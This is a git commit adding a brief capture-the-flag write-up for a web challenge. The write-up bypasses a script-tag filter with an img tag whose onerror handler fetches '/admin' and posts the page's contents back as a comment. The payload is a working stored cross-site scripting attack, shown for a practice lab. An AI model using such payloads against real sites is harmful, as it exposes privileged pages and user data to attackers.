diff options
| author | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
|---|---|---|
| committer | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
| commit | b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch) | |
| tree | 49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/web_04.md | |
initial commit
Diffstat (limited to 'punkctf/web_04.md')
| -rw-r--r-- | punkctf/web_04.md | 7 |
1 files changed, 7 insertions, 0 deletions
diff --git a/punkctf/web_04.md b/punkctf/web_04.md new file mode 100644 index 0000000..f0cffaa --- /dev/null +++ b/punkctf/web_04.md @@ -0,0 +1,7 @@ + +Now our input sanitises out script fields, however it still allows us to make images. +We use the normal technique of putting a bad image url in them, then adding js in the onerror attribute, with the same JS as `XSS - Medium`. + +``` +<img src=x onerror="fetch('/admin').then(r => r.text()).then(d => {let data = new URLSearchParams(); data.append('name', 'admin page'); data.append('comment', d); fetch('/new-comment', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: data });})"> +``` |